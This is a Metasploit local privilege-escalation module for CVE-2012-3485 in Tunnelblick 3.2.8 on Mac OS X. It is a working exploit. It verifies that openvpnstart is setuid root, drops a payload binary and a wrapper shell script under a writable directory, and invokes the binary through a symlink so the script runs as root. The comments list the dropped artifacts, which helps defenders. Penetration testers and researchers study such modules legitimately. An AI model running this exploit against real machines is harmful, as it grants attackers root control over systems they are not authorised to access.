##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege-escalation module for CVE-2012-3485 (Tunnelblick 3.2.8,
# setuid openvpnstart on Mac OS X). Everything the module writes to the target
# lives under the WritableDir option (see #exploit), which is also where a
# responder would look for leftover artifacts.
class MetasploitModule < Msf::Exploit::Local
  # Module ranking constant consumed by the framework.
  Rank = ExcellentRanking

  include Msf::Post::OSX::Priv
  include Msf::Post::File
  include Msf::Exploit::EXE

  # Module metadata and datastore options. PrependSetresuid and WfsDelay are
  # framework-level payload/handler options; their semantics are defined in
  # the framework, not here.
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Setuid Tunnelblick Privilege Escalation',
          'Description' => %q{
            This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The
            vulnerability exists in the setuid openvpnstart, where an insufficient
            validation of path names allows execution of arbitrary shell scripts as root.
            This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099
            over Mac OS X 10.7.5.
          },
          'References' => [
            [ 'CVE', '2012-3485' ],
            [ 'OSVDB', '84706' ],
            [ 'EDB', '20443' ],
            [ 'URL', 'http://blog.zx2c4.com/791' ]
          ],
          'License' => MSF_LICENSE,
          'Author' => [
            'Jason A. Donenfeld', # Vulnerability discovery and original Exploit
            'juan vazquez' # Metasploit module
          ],
          'DisclosureDate' => '2012-08-11',
          'Platform' => 'osx',
          'Arch' => [ ARCH_X86, ARCH_X64 ],
          'SessionTypes' => [ 'shell' ],
          'Targets' => [
            [ 'Tunnelblick 3.2.8 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],
            [ 'Tunnelblick 3.2.8 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]
          ],
          'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
          'DefaultTarget' => 0,
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          }
        }
      )
    )
    # Both values are interpolated unquoted into shell command strings below
    # (find, mkdir, chmod, ln, rm). A value containing spaces or shell
    # metacharacters will break those commands rather than be escaped.
    register_options [
      # These are not OptPath because it's a *remote* path
      OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
      OptString.new("Tunnelblick", [ true, "Path to setuid openvpnstart executable", "/Applications/Tunnelblick.app/Contents/Resources/openvpnstart" ])
    ]
  end

  # Remote directory that receives every dropped artifact. `to_s` turns a nil
  # datastore entry into an empty string instead of raising.
  #
  # @return [String]
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Reports CheckCode::Safe unless the configured openvpnstart path exists on
  # the target and `find` lists it as a regular file owned by root with the
  # setuid bit set (-perm -4000). Only the setuid bit is inspected, not the
  # Tunnelblick version: a patched build that is still installed setuid root
  # would also be reported as Vulnerable, so treat the result as a
  # precondition check rather than proof of the vulnerability.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    unless file? datastore['Tunnelblick']
      vprint_error 'openvpnstart not found'
      return CheckCode::Safe
    end

    # Local variable `check` shadows this method name for the rest of the body.
    check = cmd_exec("find #{datastore["Tunnelblick"]} -type f -user root -perm -4000")

    # `find` prints matching paths; an empty result means the file is not
    # setuid root (or not owned by root).
    unless check.include? 'openvpnstart'
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  # Removes the symlink created in #exploit (@link) and the staged
  # `openvpn` directory under base_dir. @link is only assigned inside
  # #exploit, so this is meant to run after that step has been reached.
  def clean
    file_rm(@link)
    cmd_exec("rm -rf #{base_dir}/openvpn")
  end

  # Drops the payload and a wrapper script under base_dir, symlinks
  # openvpnstart into base_dir and invokes it through that symlink.
  #
  # Artifacts written to the target (useful as forensic indicators):
  #   - #{base_dir}/openvpn/openvpn-0/<random 8 letters>  (payload executable)
  #   - #{base_dir}/openvpn/openvpn-0/openvpn             (wrapper script)
  #   - #{base_dir}/<random 8 letters>                    (symlink to openvpnstart)
  # On the success path these are left in place; only the failure path calls
  # #clean. Success is not verified here beyond cmd_exec returning without
  # raising.
  def exploit
    # Guard clauses: refuse to run as root, re-run #check, require a writable
    # staging directory. fail_with aborts the module.
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    if check != CheckCode::Vulnerable
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # Directory layout the module description attributes to openvpnstart's
    # path handling; the exact lookup performed by the binary is not visible
    # here.
    print_status("Creating directory...")
    cmd_exec "mkdir -p #{base_dir}/openvpn/openvpn-0"

    # Payload binary with a random name, made executable.
    exe_name = rand_text_alpha(8)
    @exe_file = "#{base_dir}/openvpn/openvpn-0/#{exe_name}"
    print_status("Dropping executable #{@exe_file}")
    write_file(@exe_file, generate_payload_exe)
    cmd_exec "chmod +x #{@exe_file}"

    # Two-line sh wrapper whose only action is to run the dropped payload.
    evil_sh = <<~EOF
      #!/bin/sh
      #{@exe_file}
    EOF

    @sh_file = "#{base_dir}/openvpn/openvpn-0/openvpn"
    print_status("Dropping shell script #{@sh_file}...")
    write_file(@sh_file, evil_sh)
    cmd_exec "chmod +x #{@sh_file}"

    # Symlink to the configured openvpnstart path; `-f` silently replaces an
    # existing file of the same (random) name.
    link_name = rand_text_alpha(8)
    @link = "#{base_dir}/#{link_name}"
    print_status("Creating symlink #{@link}...")
    cmd_exec "ln -s -f -v #{datastore["Tunnelblick"]} #{@link}"

    print_status("Running...")
    begin
      cmd_exec "#{@link} OpenVPNInfo 0"
    rescue
      # Bare rescue catches StandardError from cmd_exec only; a command that
      # ran but did nothing useful is not detected here.
      print_error("Failed. Cleaning files #{@link} and the #{base_dir}/openvpn directory")
      clean
      return
    end
    # Cleanup on success is left to the operator.
    print_warning("Remember to clean files: #{@link} and the #{base_dir}/openvpn directory")
  end
end